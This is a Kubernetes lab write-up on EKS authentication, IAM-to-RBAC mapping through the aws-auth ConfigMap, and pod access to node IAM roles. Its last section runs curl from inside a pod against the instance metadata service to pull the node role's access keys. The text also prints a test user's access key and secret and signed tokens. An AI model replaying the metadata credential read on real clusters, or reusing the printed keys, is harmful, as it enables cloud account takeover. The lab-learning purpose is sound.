k8s-aws-v1.aHR0cHM6Ly9zdHMuYXAtbm9ydGhlYXN0LTIuYW1hem9uYXdzLmNvbS8_QWN0aW9uPUdldENhbGxlcklkZW50aXR5JlZlcnNpb249MjAxMS0wNi0xNSZYLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFUT0gyRklKUVlCRVBTSU03JTJGMjAyNDA0MTIlMkZhcC1ub3J0aGVhc3QtMiUyRnN0cyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNDEyVDEzMzQ1NFomWC1BbXotRXhwaXJlcz02MCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QlM0J4LWs4cy1hd3MtaWQmWC1BbXotU2lnbmF0dXJlPTVlMzlmNGM4M2RkODgzMTYzZWIwYmZlN2MyZGNkZDUzZmE4NTE4ZGQxZjk5ZDI1ZjAwZGQ1M2I0YjI5MzhmNTQ
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws eks get-token --cluster-name $CLUSTER_NAME | jq -r '.status.token'
k8s-aws-v1.aHR0cHM6Ly9zdHMuYXAtbm9ydGhlYXN0LTIuYW1hem9uYXdzLmNvbS8_QWN0aW9uPUdldENhbGxlcklkZW50aXR5JlZlcnNpb249MjAxMS0wNi0xNSZYLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFUT0gyRklKUVlCRVBTSU03JTJGMjAyNDA0MTIlMkZhcC1ub3J0aGVhc3QtMiUyRnN0cyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwNDEyVDEzMzQ1NlomWC1BbXotRXhwaXJlcz02MCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QlM0J4LWs4cy1hd3MtaWQmWC1BbXotU2lnbmF0dXJlPWI4MjhiNzJjMWRmMDAzNzdmNzlkNjRjNzMxMDU0MTdkYmE0OWYzY2VhMmIzNGE3NmQ4YzYwZjdkNDczZDQzZTk
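The token is just "k8s-aws-v1." plus a base64url-encoded pre-signed STS GetCallerIdentity URL; a rough way to peek inside it (padding may be missing, so base64 can complain about the last few bytes):
# decode the pre-signed URL hidden inside the token (best-effort)
TOKEN=$(aws eks get-token --cluster-name $CLUSTER_NAME | jq -r '.status.token')
echo "${TOKEN#k8s-aws-v1.}" | tr '_-' '/+' | base64 -d 2>/dev/null ; echo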
2. kubectl's client-go library sends the pre-signed URL as a bearer token to the EKS cluster API endpoint.
3. The EKS API server sends a TokenReview to the webhook token authenticator ⇒ (STS GetCallerIdentity is called) after AWS IAM authenticates the call, the user/role ARN is returned.
# Check the tokenreviews API resource
## TokenReview is what gets executed here
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl api-resources | grep authentication
selfsubjectreviews authentication.k8s.io/v1 false SelfSubjectReview
tokenreviews authentication.k8s.io/v1 false TokenReview
# List the fields for supported resources.
$ kubectl explain tokenreviews
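What the API server hands to the authenticator is essentially a TokenReview object; a minimal sketch of the request/response shape (the token value is elided, and the response shown in comments is illustrative):
apiVersion: authentication.k8s.io/v1
kind: TokenReview
spec:
  token: k8s-aws-v1....            # the bearer token produced by aws eks get-token
# the webhook answers with status.authenticated plus the mapped user info, e.g.:
# status:
#   authenticated: true
#   user:
#     username: arn:aws:iam::<account>:user/<name>
#     groups: ["system:authenticated"]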
4. Kubernetes RBAC authorization is processed next.
# Check the webhook API resources
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl api-resources | grep Webhook
mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration
# Check the validatingwebhookconfigurations resources
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get validatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 87m
eks-aws-auth-configmap-validation-webhook 1 107m ## this is the relevant resource
kube-prometheus-stack-admission 1 85m
vpc-resource-validating-webhook 2 107m
# Check the aws-auth ConfigMap
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh
apiVersion: v1
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
      username: system:node:{{EC2PrivateDNSName}}
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
#---< The rest is omitted (presumably). The ARN is the IAM user that created the EKS cluster. If it were still listed here, could it be recovered after an accidental deletion? It used to be present in aws-auth, but it is no longer shown, so the creating principal can no longer be identified this way. It used to look roughly like:
  mapUsers: |
    - groups:
      - system:masters
      userarn: arn:aws:iam::111122223333:user/admin
      username: kubernetes-admin
# Info about the IAM user that created the EKS cluster >> how did system:authenticated get added?
$ kubectl rbac-tool whoami
# Check the system:masters and system:authenticated groups
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool lookup system:masters
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+----------------+--------------+-------------+-----------+---------------+---------------+
system:masters | Group | ClusterRole | | cluster-admin | cluster-admin
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rbac-tool lookup system:authenticated
SUBJECT | SUBJECT TYPE | SCOPE | NAMESPACE | ROLE | BINDING
+----------------------+--------------+-------------+-----------+---------------------------+---------------------------+
system:authenticated | Group | ClusterRole | | system:basic-user | system:basic-user
system:authenticated | Group | ClusterRole | | system:discovery | system:discovery
system:authenticated | Group | ClusterRole | | system:public-info-viewer | system:public-info-viewer
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rolesum -k Group system:masters
Group: system:masters
Policies:
• [CRB] */cluster-admin ⟶ [CR] */cluster-admin
Resource Name Exclude Verbs G L W C U P D DC
*.* [*] [-] [-] ✔ ✔ ✔ ✔ ✔ ✔ ✔ ✔
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl rolesum -k Group system:authenticated
Group: system:authenticated
Policies:
• [CRB] */system:basic-user ⟶ [CR] */system:basic-user
Resource Name Exclude Verbs G L W C U P D DC
selfsubjectaccessreviews.authorization.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
selfsubjectreviews.authentication.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
selfsubjectrulesreviews.authorization.k8s.io [*] [-] [-] ✖ ✖ ✖ ✔ ✖ ✖ ✖ ✖
• [CRB] */system:discovery ⟶ [CR] */system:discovery
• [CRB] */system:public-info-viewer ⟶ [CR] */system:public-info-viewer
# Check the ClusterRole usable by the system:masters group: cluster-admin
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe clusterrolebindings.rbac.authorization.k8s.io cluster-admin
Name: cluster-admin
Labels: kubernetes.io/bootstrapping=rbac-defaults
Annotations: rbac.authorization.kubernetes.io/autoupdate: true
Role:
Kind: ClusterRole
Name: cluster-admin
Subjects:
Kind Name Namespace
---- ---- ---------
Group system:masters
# Check cluster-admin's PolicyRule: usable on every resource
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe clusterrole cluster-admin
Name: cluster-admin
Labels: kubernetes.io/bootstrapping=rbac-defaults
Annotations: rbac.authorization.kubernetes.io/autoupdate: true
PolicyRule:
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
[*] [] [*]
# Check the ClusterRoles usable by the system:authenticated group
kubectl describe ClusterRole system:discovery
kubectl describe ClusterRole system:public-info-viewer
kubectl describe ClusterRole system:basic-user
kubectl describe ClusterRole eks:podsecuritypolicy:privileged
The user created here will be deleted after the lab!
Open another terminal and SSH into the Bastion-2 instance.
# Create the testuser IAM user
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws iam create-user --user-name testuser
{
"User": {
"Path": "/",
"UserName": "testuser",
"UserId": "AIDATOH2FIJQZQUSI5J7W",
"Arn": "arn:aws:iam::236747833953:user/testuser",
"CreateDate": "2024-04-12T14:03:12+00:00"
}
}
# Grant the user programmatic access (create an access key)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws iam create-access-key --user-name testuser
{
"AccessKey": {
"UserName": "testuser",
"AccessKeyId": "AKIATOH2FIJQSSIHIZGL",
"Status": "Active",
"SecretAccessKey": "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",
"CreateDate": "2024-04-12T14:03:28+00:00"
}
}
# Attach a policy to testuser
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name testuser
# Check get-caller-identity
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/leeeuijoo"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl whoami
arn:aws:iam::236747833953:user/leeeuijoo
# Errors out because no credentials are configured yet
[root@myeks2-bastion-2 ~]# aws sts get-caller-identity --query Arn
Unable to locate credentials. You can configure credentials by running "aws configure".
# Configure testuser credentials
[root@myeks2-bastion-2 ~]# aws configure
AWS Access Key ID [None]:
..
[root@myeks2-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::236747833953:user/testuser"
# Try kubectl >> even though testuser has AdministratorAccess, it fails because there is no kubeconfig file yet
[root@myeks2-bastion-2 ~]# clear
[root@myeks2-bastion-2 ~]# kubectl get node -v6
I0412 23:09:59.345744 1821 round_trippers.go:553] GET http://localhost:8080/api?timeout=32s in 0 milliseconds
E0412 23:09:59.345863 1821 memcache.go:265] couldn't get current server API group list: Get "http://localhost:8080/api?timeout=32s": dial tcp 127.0.0.1:8080: connect: connection refused
I0412 23:09:59.345904 1821 cached_discovery.go:120] skipped caching discovery info due to Get \
...
[root@myeks2-bastion-2 ~]# ls ~/.kube
ls: cannot access /root/.kube: No such file or directory
# Option 1: use eksctl >> running create iamidentitymapping writes the aws-auth ConfigMap for you
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl create iamidentitymapping --cluster $CLUSTER_NAME --username testuser --group system:masters --arn arn:aws:iam::$ACCOUNT_ID:user/testuser
2024-04-12 23:13:26 [ℹ] checking arn arn:aws:iam::236747833953:user/testuser against entries in the auth ConfigMap
2024-04-12 23:13:26 [ℹ] adding identity "arn:aws:iam::236747833953:user/testuser" to auth ConfigMap
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
arn:aws:iam::236747833953:user/testuser testuser system:masters
# The resulting aws-auth ConfigMap now maps testuser into system:masters:
apiVersion: v1
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
      username: system:node:{{EC2PrivateDNSName}}
  mapUsers: |
    - groups:
      - system:masters
      userarn: arn:aws:iam::236747833953:user/testuser
      username: testuser
# Generate a kubeconfig for testuser >> aws eks update-kubeconfig works because testuser was granted permissions (AdministratorAccess) when it was created
[root@myeks2-bastion-2 ~]# aws eks update-kubeconfig --name $CLUSTER_NAME --user-alias testuser
Added new context testuser to /root/.kube/config
# Compare with the config on the first bastion EC2
-> The contents are essentially identical.
# Confirm kubectl works
(testuser:N/A) [root@myeks2-bastion-2 ~]# kubectl ns default
Context "testuser" modified.
Active namespace is "default".
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get node -v6
I0412 23:21:36.278032 1988 loader.go:395] Config loaded from file: /root/.kube/config
I0412 23:21:36.966772 1988 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/nodes?limit=500 200 OK in 680 milliseconds
NAME STATUS ROLES AGE VERSION
ip-192-168-1-231.ap-northeast-2.compute.internal Ready <none> 136m v1.28.5-eks-5e0fdde
ip-192-168-2-179.ap-northeast-2.compute.internal Ready <none> 136m v1.28.5-eks-5e0fdde
ip-192-168-3-12.ap-northeast-2.compute.internal Ready <none> 136m v1.28.5-eks-5e0fdde
# Check with kubectl rbac-tool whoami >> compare against the original account
{Username: "testuser",
UID: "aws-iam-authenticator:236747833953:AIDATOH2FIJQZQUSI5J7W",
Groups: ["system:masters",
"system:authenticated"],
Extra: {accessKeyId: ["AKIATOH2FIJQSSIHIZGL"],
arn: ["arn:aws:iam::236747833953:user/testuser"],
canonicalArn: ["arn:aws:iam::236747833953:user/testuser"],
principalId: ["AIDATOH2FIJQZQUSI5J7W"],
sessionName: [""]}}
# Edit mapUsers directly with kubectl edit: change the group to system:authenticated
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl edit cm -n kube-system aws-auth
configmap/aws-auth edited
# Confirm the change
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
arn:aws:iam::236747833953:user/testuser testuser system:authenticated
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get node -v6
I0412 23:26:01.651031 2163 loader.go:395] Config loaded from file: /root/.kube/config
I0412 23:26:02.599377 2163 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/nodes?limit=500 403 Forbidden in 936 milliseconds
I0412 23:26:02.599785 2163 helpers.go:246] server response object: [{
"kind": "Status",
"apiVersion": "v1",
"metadata": {},
"status": "Failure",
"message": "nodes is forbidden: User \"testuser\" cannot list resource \"nodes\" in API group \"\" at the cluster scope",
"reason": "Forbidden",
"details": {
"kind": "nodes"
},
"code": 403
}]
Error from server (Forbidden): nodes is forbidden: User "testuser" cannot list resource "nodes" in API group "" at the cluster scope
$ kubectl api-resources -v5
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl api-resources -v5
NAME SHORTNAMES APIVERSION NAMESPACED KIND
bindings v1 true Binding
componentstatuses cs v1 false ComponentStatus
configmaps cm v1 true ConfigMap
endpoints ep v1 true Endpoints
events ev v1 true Event
limitranges limits v1 true LimitRange
namespaces ns v1 false Namespace
nodes no v1 false Node
persistentvolumeclaims pvc v1 true PersistentVolumeClaim
persistentvolumes pv v1 false PersistentVolume
pods po v1 true Pod
podtemplates v1 true PodTemplate
replicationcontrollers rc v1 true ReplicationController
resourcequotas quota v1 true ResourceQuota
secrets v1 true Secret
serviceaccounts sa v1 true ServiceAccount
services svc v1 true Service
mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration
customresourcedefinitions crd,crds apiextensions.k8s.io/v1 false CustomResourceDefinition
apiservices apiregistration.k8s.io/v1 false APIService
controllerrevisions apps/v1 true ControllerRevision
daemonsets ds apps/v1 true DaemonSet
deployments deploy apps/v1 true Deployment
replicasets rs apps/v1 true ReplicaSet
statefulsets sts apps/v1 true StatefulSet
selfsubjectreviews authentication.k8s.io/v1 false SelfSubjectReview
tokenreviews authentication.k8s.io/v1 false TokenReview
localsubjectaccessreviews authorization.k8s.io/v1 true LocalSubjectAccessReview
selfsubjectaccessreviews authorization.k8s.io/v1 false SelfSubjectAccessReview
selfsubjectrulesreviews authorization.k8s.io/v1 false SelfSubjectRulesReview
subjectaccessreviews authorization.k8s.io/v1 false SubjectAccessReview
horizontalpodautoscalers hpa autoscaling/v2 true HorizontalPodAutoscaler
cronjobs cj batch/v1 true CronJob
jobs batch/v1 true Job
certificatesigningrequests csr certificates.k8s.io/v1 false CertificateSigningRequest
leases coordination.k8s.io/v1 true Lease
eniconfigs crd.k8s.amazonaws.com/v1alpha1 false ENIConfig
endpointslices discovery.k8s.io/v1 true EndpointSlice
ingressclassparams elbv2.k8s.aws/v1beta1 false IngressClassParams
targetgroupbindings elbv2.k8s.aws/v1beta1 true TargetGroupBinding
events ev events.k8s.io/v1 true Event
flowschemas flowcontrol.apiserver.k8s.io/v1beta3 false FlowSchema
prioritylevelconfigurations flowcontrol.apiserver.k8s.io/v1beta3 false PriorityLevelConfiguration
nodes metrics.k8s.io/v1beta1 false NodeMetrics
pods metrics.k8s.io/v1beta1 true PodMetrics
alertmanagerconfigs amcfg monitoring.coreos.com/v1alpha1 true AlertmanagerConfig
alertmanagers am monitoring.coreos.com/v1 true Alertmanager
podmonitors pmon monitoring.coreos.com/v1 true PodMonitor
probes prb monitoring.coreos.com/v1 true Probe
prometheusagents promagent monitoring.coreos.com/v1alpha1 true PrometheusAgent
prometheuses prom monitoring.coreos.com/v1 true Prometheus
prometheusrules promrule monitoring.coreos.com/v1 true PrometheusRule
scrapeconfigs scfg monitoring.coreos.com/v1alpha1 true ScrapeConfig
servicemonitors smon monitoring.coreos.com/v1 true ServiceMonitor
thanosrulers ruler monitoring.coreos.com/v1 true ThanosRuler
policyendpoints networking.k8s.aws/v1alpha1 true PolicyEndpoint
ingressclasses networking.k8s.io/v1 false IngressClass
ingresses ing networking.k8s.io/v1 true Ingress
networkpolicies netpol networking.k8s.io/v1 true NetworkPolicy
runtimeclasses node.k8s.io/v1 false RuntimeClass
poddisruptionbudgets pdb policy/v1 true PodDisruptionBudget
clusterrolebindings rbac.authorization.k8s.io/v1 false ClusterRoleBinding
clusterroles rbac.authorization.k8s.io/v1 false ClusterRole
rolebindings rbac.authorization.k8s.io/v1 true RoleBinding
roles rbac.authorization.k8s.io/v1 true Role
priorityclasses pc scheduling.k8s.io/v1 false PriorityClass
csidrivers storage.k8s.io/v1 false CSIDriver
csinodes storage.k8s.io/v1 false CSINode
csistoragecapacities storage.k8s.io/v1 true CSIStorageCapacity
storageclasses sc storage.k8s.io/v1 false StorageClass
volumeattachments storage.k8s.io/v1 false VolumeAttachment
cninodes cnd vpcresources.k8s.aws/v1alpha1 false CNINode
securitygrouppolicies sgp vpcresources.k8s.aws/v1beta1 true SecurityGroupPolicy
# Delete the testuser IAM identity mapping
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl delete iamidentitymapping --cluster $CLUSTER_NAME --arn arn:aws:iam::$ACCOUNT_ID:user/testuser
2024-04-12 23:28:35 [ℹ] removing identity "arn:aws:iam::236747833953:user/testuser" from auth ConfigMap (username = "testuser", groups = ["system:authenticated"])
# Get IAM identity mapping(s)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get cm -n kube-system aws-auth -o yaml | yh
...
  mapUsers: |
    []
kind: ConfigMap
metadata:
  creationTimestamp: "2024-04-12T12:04:18Z"
  name: aws-auth
  namespace: kube-system
  resourceVersion: "44284"
  uid: fad6d576-294c-42e6-882e-e5012465be0a
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl get node -v6
I0412 23:30:23.250487 2378 loader.go:395] Config loaded from file: /root/.kube/config
I0412 23:30:24.646041 2378 round_trippers.go:553] GET https://D3C1852AD76B4F7ACB305E84C0E3FAD5.sk1.ap-northeast-2.eks.amazonaws.com/api/v1/nodes?limit=500 401 Unauthorized in 1386 milliseconds
I0412 23:30:24.646308 2378 helpers.go:246] server response object: [{
"kind": "Status",
"apiVersion": "v1",
"metadata": {},
"status": "Failure",
"message": "Unauthorized",
"reason": "Unauthorized",
"code": 401
}]
error: You must be logged in to the server (Unauthorized)
(testuser:default) [root@myeks2-bastion-2 ~]# kubectl api-resources -v5
E0412 23:30:29.776461 2432 memcache.go:265] couldn't get current server API group list: the server has asked for the client to provide credentials
I0412 23:30:29.776486 2432 cached_discovery.go:120] skipped caching discovery info due to the server has asked for the client to provide credentials
NAME SHORTNAMES APIVERSION NAMESPACED KIND
I0412 23:30:29.776667 2432 helpers.go:246] server response object: [{
"metadata": {},
"status": "Failure",
"message": "the server has asked for the client to provide credentials",
"reason": "Unauthorized",
"details": {
"causes": [
{
"reason": "UnexpectedServerResponse",
"message": "unknown"
}
]
},
"code": 401
}]
error: You must be logged in to the server (the server has asked for the client to provide credentials)
Sample Config File
# Please edit the object below. Lines beginning with a '#' will be ignored,
# and an empty file will abort the edit. If an error occurs while saving this file will be
# reopened with the relevant failures.
#
apiVersion: v1
data:
  mapRoles: |
    - groups:
      - system:bootstrappers
      - system:nodes
      rolearn: arn:aws:iam::111122223333:role/my-role
      username: system:node:{{EC2PrivateDNSName}}
    - groups:
      - eks-console-dashboard-full-access-group
      rolearn: arn:aws:iam::111122223333:role/my-console-viewer-role
      username: my-console-viewer-role
  mapUsers: |
    - groups:
      - system:masters
      userarn: arn:aws:iam::111122223333:user/admin
      username: admin
    - groups:
      - eks-console-dashboard-restricted-access-group
      userarn: arn:aws:iam::444455556666:user/my-user
      username: my-user
# Check the STS ARN on each node: the suffix after the role name is the instance ID acting as the session name
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node aws sts get-caller-identity --query Arn; done
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-0ba38cf4130566468"
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-0b895572c43f3680b"
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-003d0540317262201"
# Check the aws-auth ConfigMap >> what permissions do system:nodes and system:bootstrappers carry?
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl describe configmap -n kube-system aws-auth
Name: aws-auth
Namespace: kube-system
Labels: <none>
Annotations: <none>
Data
====
mapRoles:
----
- groups:
  - system:bootstrappers
  - system:nodes
  rolearn: arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
  username: system:node:{{EC2PrivateDNSName}}
mapUsers:
----
[]
BinaryData
====
Events: <none>
# Get IAM identity mapping(s)
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::236747833953:role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes
# Create awscli pods
cat <<EOF | kubectl create -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: awscli-pod
spec:
  replicas: 2
  selector:
    matchLabels:
      app: awscli-pod
  template:
    metadata:
      labels:
        app: awscli-pod
    spec:
      containers:
      - name: awscli-pod
        image: amazon/aws-cli
        command: ["tail"]
        args: ["-f", "/dev/null"]
      terminationGracePeriodSeconds: 0
EOF
# Confirm the pods are running
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl get pod -owide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
awscli-pod-5bdb44b5bd-9b99k 1/1 Running 0 16s 192.168.1.162 ip-192-168-1-231.ap-northeast-2.compute.internal <none> <none>
awscli-pod-5bdb44b5bd-g6gdk 1/1 Running 0 16s 192.168.3.16 ip-192-168-3-12.ap-northeast-2.compute.internal <none> <none>
# Store the pod names in variables
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# APODNAME1=$(kubectl get pod -l app=awscli-pod -o jsonpath={.items[0].metadata.name})
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# APODNAME2=$(kubectl get pod -l app=awscli-pod -o jsonpath={.items[1].metadata.name})
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# echo $APODNAME1, $APODNAME2
awscli-pod-5bdb44b5bd-9b99k, awscli-pod-5bdb44b5bd-g6gdk
# From the awscli pods, check the ARN of the EC2 instance profile (IAM role) - wait, why does this even work?
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it $APODNAME1 -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-0ba38cf4130566468"
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it $APODNAME2 -- aws sts get-caller-identity --query Arn
"arn:aws:sts::236747833953:assumed-role/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G/i-003d0540317262201"
# Query AWS services from the awscli pods using the EC2 instance profile (IAM role) >> how is this possible with no separate IAM credentials?
kubectl exec -it $APODNAME1 -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager
kubectl exec -it $APODNAME2 -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager
# Check EC2 metadata: IMDSv1 is disabled, IMDSv2 is enabled; IAM role - link
(leeeuijoo@myeks2:default) [root@myeks2-bastion ~]# kubectl exec -it $APODNAME1 -- bash
bash-4.2#
---------------
bash-4.2# curl -s http://169.254.169.254/ -v
* Trying 169.254.169.254:80...
* Connected to 169.254.169.254 (169.254.169.254) port 80
> GET / HTTP/1.1
> Host: 169.254.169.254
> User-Agent: curl/8.3.0
> Accept: */*
>
< HTTP/1.1 401 Unauthorized
< Content-Length: 0
< Date: Fri, 12 Apr 2024 14:45:28 GMT
< Server: EC2ws
< Connection: close
< Content-Type: text/plain
<
* Closing connection
# Request a token
bash-4.2# curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" ; echo
AQAEAGvssGgyhaNFZdQEwAJ4-GhOCOZ5t-w1_mZsfyymWFB0OW4WEw==
# Use IMDSv2 with the token
bash-4.2# TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
bash-4.2# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/ ; echo
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
...
bash-4.2# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/ ; echo
dynamic
meta-data
user-data
...
bash-4.2# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/ ; echo
eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
# Plug the IAM role name printed above into the path below and check
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
bash-4.2# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-myeks2-nodegroup-ng1-NodeInstanceRole-9MqI00m6ES4G
{
"Code" : "Success",
"LastUpdated" : "2024-04-12T14:46:05Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIATOH2FIJQUA4MUTSA",
"SecretAccessKey" : "rAHJHsvgXfe3lhf7BVsWB66KtTYXxeClkyOuhhhQ",
